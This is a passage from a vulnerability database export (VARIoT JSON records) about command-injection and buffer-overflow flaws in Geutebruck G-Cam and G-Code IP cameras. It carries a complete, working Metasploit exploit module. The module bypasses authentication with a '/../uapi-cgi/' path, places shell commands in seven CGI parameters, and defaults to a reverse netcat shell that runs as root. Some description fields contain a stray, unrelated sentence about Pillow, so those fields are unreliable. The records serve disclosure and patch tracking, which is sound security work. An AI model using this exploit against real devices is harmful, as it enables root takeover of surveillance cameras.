            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33549"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33549",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-33549",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-33549",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33549",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33549",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2088",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-33549",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-33549"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33549"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33549"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to a stack-based buffer overflow condition in the action parameter, which may allow an attacker to remotely execute arbitrary code. G-Cam E2 and G-Code, provided by GEUTEBRUCK, contain the following multiple vulnerabilities. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549. The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability; please follow CNNVD or manufacturer announcements.",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33549"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33549"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33549",
            "trust": 2.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "164191",
            "trust": 1.7
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2088",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33549",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33549"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33549"
          }
        ]
      },
      "id": "VAR-202109-0858",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T20:43:04.157000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK\u2019s web portal (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Multiple  Geutebr\u00fcck Repair measures for the error and vulnerability of the camera device buffer",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=158068"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33549"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 2.3,
            "url": "http://packetstormsecurity.com/files/164191/geutebruck-instantrec-remote-command-execution.html"
          },
          {
            "trust": 1.7,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33549"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/121.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33549"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33549"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33549"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33549"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33549"
          },
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          },
          {
            "date": "2021-09-13T18:15:22.773000",
            "db": "NVD",
            "id": "CVE-2021-33549"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-27T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33549"
          },
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          },
          {
            "date": "2021-09-27T14:30:08.640000",
            "db": "NVD",
            "id": "CVE-2021-33549"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2088"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0849

    Vulnerability from variot - Updated: 2025-01-30 20:38

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. The following vulnerabilities exist in the G-Cam E2 and G-Code products provided by GEUTEBRUCK. * Missing authentication for critical functions (CWE-306) - CVE-2021-33543 * Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549. The expected impact depends on the vulnerability, but may be as follows. * A remote third party steals confidential information because of improper default user authentication settings - CVE-2021-33543 * A remote third party executes arbitrary code through command injection - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554 * A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545 * A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546 * A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547 * A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability; follow CNNVD or manufacturer announcements. ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    # Metasploit remote exploit module for the Geutebruck command-injection CVEs
    # listed under 'References' below. It sends a single HTTP request to one of
    # seven CGI endpoints, with a shell command placed in one request parameter.
    #
    # Reading notes for defenders (all taken from the target table in this class):
    # - Every target URI begins with '/../uapi-cgi/'. The description says the
    #   module bypasses HTTP basic authentication on /uapi-cgi/; the '/../' prefix
    #   is presumably that bypass (CVE-2021-33543) -- confirm against the advisory.
    # - Six of the seven targets wrap the command in '$( )'; the testcmd.cgi
    #   target passes it as the whole 'command' value.
    # - A request path containing '/../uapi-cgi/' or a parameter value containing
    #   '$(' sent to these CGI names is a reasonable thing to alert on in proxy
    #   or device logs -- TODO confirm against normal device traffic.
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
      # AutoCheck is prepended, so the framework runs #check before #exploit.
      prepend Msf::Exploit::Remote::AutoCheck

      # Registers the module metadata: name, description, authors, references,
      # the per-CVE target table, the default payload and the stability notes.
      #
      # @param info [Hash] metadata supplied by the framework, merged via update_info
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Geutebruck Multiple Remote Command Execution',
            'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },

            'Author' => [
              'Titouan Lazard', # Of RandoriSec - Discovery
              'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
              'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
            ],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2021-33543'],
              ['CVE', '2021-33544'],
              ['CVE', '2021-33548'],
              ['CVE', '2021-33550'],
              ['CVE', '2021-33551'],
              ['CVE', '2021-33552'],
              ['CVE', '2021-33553'],
              ['CVE', '2021-33554'],
              [ 'URL', 'http://geutebruck.com' ],
              [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
              [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
            ],
            'DisclosureDate' => '2021-07-08',
            # Declared privileged: the description states code runs as the root user.
            'Privileged' => true,
            'Platform' => ['unix', 'linux'],
            'Arch' => [ARCH_CMD],
            # One target per CVE. Each entry gives the HTTP method, the CGI path and
            # the request parameters; the value containing PLACEHOLDER_CMD is the one
            # #exploit fills with the encoded payload. The other values are random
            # filler of the stated lengths.
            'Targets' => [
              [
                'CVE-2021-33544 - certmngr.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => {
                    'action' => 'createselfcert',
                    'local' => Rex::Text.rand_text_alphanumeric(10..16),
                    'country' => Rex::Text.rand_text_alphanumeric(2),
                    'state' => '$(PLACEHOLDER_CMD)',
                    'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                    'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                    'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                    'days' => Rex::Text.rand_text_numeric(2..4),
                    'type' => Rex::Text.rand_text_numeric(2..4)
                  },
                  'uri' => '/../uapi-cgi/certmngr.cgi'
                }
              ],
              [
                'CVE-2021-33548 - factory.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
                  'uri' => '/../uapi-cgi/factory.cgi'
                }
              ],
              [
                'CVE-2021-33550 - language.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
                  'uri' => '/../uapi-cgi/language.cgi'
                }
              ],
              [
                'CVE-2021-33551 - oem.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => {
                    'action' => 'set',
                    'enable' => 'yes',
                    'environment.lang' => '$(PLACEHOLDER_CMD)'
                  },
                  'uri' => '/../uapi-cgi/oem.cgi'
                }
              ],
              [
                'CVE-2021-33552 - simple_reclistjs.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => {
                    'action' => 'get',
                    'timekey' => Rex::Text.rand_text_numeric(2..4),
                    'date' => '$(PLACEHOLDER_CMD)'
                  },
                  'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
                }
              ],
              [
                # Unlike the other targets, the placeholder here is not wrapped in '$( )'.
                'CVE-2021-33553 - testcmd.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
                  'uri' => '/../uapi-cgi/testcmd.cgi'
                }
              ],
              [
                'CVE-2021-33554 - tmpapp.cgi', {
                  'http_method' => 'GET',
                  'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
                  'uri' => '/../uapi-cgi/tmpapp.cgi'
                }
              ]
            ],
            'DefaultTarget' => 0,
            # The default payload name indicates a reverse (device-initiated) netcat
            # connection, so outbound connections from camera network segments are
            # worth monitoring or blocking -- inferred from the payload name.
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
            },
            # Author-declared properties; ARTIFACTS_ON_DISK means the module is
            # declared to leave files on the device, which is relevant to forensics.
            'Notes' => {
              'Stability' => ['CRASH_SAFE'],
              'Reliability' => ['REPEATABLE_SESSION'],
              'SideEffects' => ['ARTIFACTS_ON_DISK']
            }
          )
        )
      end

      # Reads the firmware version the device reports in /brand.xml.
      #
      # @return [String, false] the first substring of the <firmware> element text
      #   that matches the dotted four-part version pattern, or false when the
      #   request fails, the body is empty, the element is missing, or the text
      #   holds no such pattern (an error is printed in each of those cases)
      def firmware
        res = send_request_cgi(
          'method' => 'GET',
          'uri' => '/brand.xml'
        )
        unless res
          print_error('Connection failed!')
          return false
        end

        unless res&.body && !res.body.empty?
          print_error('Empty body in the response!')
          return false
        end

        res_xml = res.get_xml_document
        if res_xml.at('//firmware').nil?
          print_error('Target did not respond with a XML document containing the "firmware" element!')
          return false
        end
        raw_text = res_xml.at('//firmware').text
        # The pattern is not anchored: it accepts one digit, then three groups of
        # one to three digits, anywhere inside the element text.
        if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
          raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
        else
          print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
          false
        end
      end

      # Version-only check: compares the version returned by #firmware with the
      # affected ranges. No injection request is sent from this method.
      #
      # The same comparison is usable for patch inventory: a device reporting
      # <= 1.12.0.27, 1.12.13.2 or 1.12.14.5 falls in the affected set; see the
      # ICSA-21-208-03 advisory referenced above for remediation.
      #
      # @return [CheckCode] Unknown when no version could be read, Appears when
      #   the version is in the affected set, Safe otherwise
      def check
        version = firmware
        if version == false
          return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!')
        end

        rex_version = Rex::Version.new(version)
        vprint_status("Found Geutebruck version #{rex_version}")
        if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
          return CheckCode::Appears
        end

        CheckCode::Safe
      end

      # Builds and sends the single request described by the selected target.
      #
      # The request parameters go in the query string for GET targets and in the
      # body otherwise (every target defined in this class uses GET). The response
      # is not inspected, so the final status message is printed unconditionally.
      def exploit
        print_status("#{rhost}:#{rport} - Setting up request...")

        method = target['http_method']
        if method == 'GET'
          http_method_vars = 'vars_get'
        else
          http_method_vars = 'vars_post'
        end

        http_vars = target['http_vars']
        # Replace the literal PLACEHOLDER_CMD inside each value, in place, with the
        # encoded payload; values without the placeholder are left as they are.
        http_vars.each do |(k, v)|
          if v.include? 'PLACEHOLDER_CMD'
            http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
          end
        end

        print_status("Sending CMD injection request to #{rhost}:#{rport}")
        send_request_cgi(
          {
            'method' => method,
            'uri' => target['uri'],
            http_method_vars => http_vars
          }
        )
        print_status('Exploit complete, you should get a shell as the root user!')
      end
    end


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
